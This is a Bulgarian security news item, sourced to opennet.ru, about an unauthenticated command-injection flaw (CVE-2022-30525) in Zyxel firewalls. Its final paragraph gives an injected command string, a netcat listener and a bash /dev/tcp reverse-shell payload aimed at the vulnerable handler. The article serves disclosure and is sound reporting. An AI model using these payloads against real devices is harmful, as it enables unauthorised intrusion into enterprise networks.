Уязвимост Π² Π·Π°Ρ‰ΠΈΡ‚Π½ΠΈΡ‚Π΅ стСни Π½Π° Zyxel, която позволява изпълнСниС Π½Π° ΠΊΠΎΠ΄ Π±Π΅Π· удостовСряванС

ΠšΡ€ΠΈΡ‚ΠΈΡ‡Π½Π° уязвимост (CVE-2022-30525) Π΅ ΠΈΠ΄Π΅Π½Ρ‚ΠΈΡ„ΠΈΡ†ΠΈΡ€Π°Π½Π° Π² устройствата Zyxel ΠΎΡ‚ сСриитС ATP, VPN ΠΈ USG FLEX, ΠΏΡ€Π΅Π΄Π½Π°Π·Π½Π°Ρ‡Π΅Π½ΠΈ Π΄Π° ΠΎΡ€Π³Π°Π½ΠΈΠ·ΠΈΡ€Π°Ρ‚ Ρ€Π°Π±ΠΎΡ‚Π°Ρ‚Π° Π½Π° Π·Π°Ρ‰ΠΈΡ‚Π½ΠΈ стСни, IDS ΠΈ VPN Π² прСдприятията, ΠΊΠΎΠ΅Ρ‚ΠΎ позволява Π½Π° външСн Π°Ρ‚Π°ΠΊΡƒΠ²Π°Ρ‰ Π΄Π° изпълни ΠΊΠΎΠ΄ Π½Π° устройство Π±Π΅Π· потрСбитСлски ΠΏΡ€Π°Π²Π° Π±Π΅Π· удостовСряванС. Π—Π° Π΄Π° ΠΈΠ·Π²ΡŠΡ€ΡˆΠΈ Π°Ρ‚Π°ΠΊΠ°, нападатСлят трябва Π΄Π° ΠΌΠΎΠΆΠ΅ Π΄Π° ΠΈΠ·ΠΏΡ€Π°Ρ‰Π° заявки Π΄ΠΎ устройството, ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π°ΠΉΠΊΠΈ HTTP/HTTPS ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»Π°. Zyxel ΠΏΠΎΠΏΡ€Π°Π²ΠΈ уязвимостта Π² актуализацията Π½Π° Ρ„ΡŠΡ€ΠΌΡƒΠ΅Ρ€Π° ZLD 5.30. Π‘ΠΏΠΎΡ€Π΅Π΄ услугата Shodan Π² ΠΌΠΎΠΌΠ΅Π½Ρ‚Π° Π² Π³Π»ΠΎΠ±Π°Π»Π½Π°Ρ‚Π° ΠΌΡ€Π΅ΠΆΠ° ΠΈΠΌΠ° 16213 XNUMX ΠΏΠΎΡ‚Π΅Π½Ρ†ΠΈΠ°Π»Π½ΠΎ уязвими устройства, ΠΊΠΎΠΈΡ‚ΠΎ ΠΏΡ€ΠΈΠ΅ΠΌΠ°Ρ‚ заявки Ρ‡Ρ€Π΅Π· HTTP/HTTPS.

ΠžΠΏΠ΅Ρ€Π°Ρ†ΠΈΡΡ‚Π° сС ΠΈΠ·Π²ΡŠΡ€ΡˆΠ²Π° Ρ‡Ρ€Π΅Π· ΠΈΠ·ΠΏΡ€Π°Ρ‰Π°Π½Π΅ Π½Π° спСциално ΠΏΡ€ΠΎΠ΅ΠΊΡ‚ΠΈΡ€Π°Π½ΠΈ ΠΊΠΎΠΌΠ°Π½Π΄ΠΈ към ΡƒΠ΅Π± ΠΌΠ°Π½ΠΈΠΏΡƒΠ»Π°Ρ‚ΠΎΡ€Π° /ztp/cgi-bin/handler, Π΄ΠΎΡΡ‚ΡŠΠΏΠ΅Π½ Π±Π΅Π· удостовСряванС. ΠŸΡ€ΠΎΠ±Π»Π΅ΠΌΡŠΡ‚ Π΅ ΠΏΡ€ΠΈΡ‡ΠΈΠ½Π΅Π½ ΠΎΡ‚ липсата Π½Π° ΠΏΡ€Π°Π²ΠΈΠ»Π½ΠΎ почистванС Π½Π° ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€ΠΈΡ‚Π΅ Π½Π° заявката ΠΏΡ€ΠΈ изпълнСниС Π½Π° ΠΊΠΎΠΌΠ°Π½Π΄ΠΈ Π² систСмата с ΠΏΠΎΠΌΠΎΡ‰Ρ‚Π° Π½Π° ΠΈΠ·Π²ΠΈΠΊΠ²Π°Π½Π΅Ρ‚ΠΎ os.system, ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π°Π½ΠΎ Π² Π±ΠΈΠ±Π»ΠΈΠΎΡ‚Π΅ΠΊΠ°Ρ‚Π° lib_wan_settings.py ΠΈ изпълнСно ΠΏΡ€ΠΈ ΠΎΠ±Ρ€Π°Π±ΠΎΡ‚ΠΊΠ° Π½Π° опСрацията setWanPortSt.

НапримСр, нападатСлят ΠΌΠΎΠΆΠ΅ Π΄Π° ΠΏΡ€Π΅Π΄Π°Π΄Π΅ Π½ΠΈΠ·Π° β€ž; ping 192.168.1.210;" ΠΊΠΎΠ΅Ρ‚ΠΎ Ρ‰Π΅ Π΄ΠΎΠ²Π΅Π΄Π΅ Π΄ΠΎ изпълнСниС Π½Π° ΠΊΠΎΠΌΠ°Π½Π΄Π°Ρ‚Π° β€œping 192.168.1.210” Π² систСмата. Π—Π° Π΄Π° ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚Π΅ Π΄ΠΎΡΡ‚ΡŠΠΏ Π΄ΠΎ ΠΊΠΎΠΌΠ°Π½Π΄Π½Π°Ρ‚Π° ΠΎΠ±Π²ΠΈΠ²ΠΊΠ°, ΠΌΠΎΠΆΠ΅Ρ‚Π΅ Π΄Π° стартиратС β€œnc -lvnp 1270” Π½Π° Π²Π°ΡˆΠ°Ρ‚Π° систСма ΠΈ слСд Ρ‚ΠΎΠ²Π° Π΄Π° ΠΈΠ½ΠΈΡ†ΠΈΠΈΡ€Π°Ρ‚Π΅ ΠΎΠ±Ρ€Π°Ρ‚Π½Π° Π²Ρ€ΡŠΠ·ΠΊΠ°, ΠΊΠ°Ρ‚ΠΎ ΠΈΠ·ΠΏΡ€Π°Ρ‚ΠΈΡ‚Π΅ заявка Π΄ΠΎ устройството с '; bash -c \Β»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\Β»;'.

Π˜Π·Ρ‚ΠΎΡ‡Π½ΠΈΠΊ: opennet.ru

ДобавянС Π½Π° Π½ΠΎΠ² ΠΊΠΎΠΌΠ΅Π½Ρ‚Π°Ρ€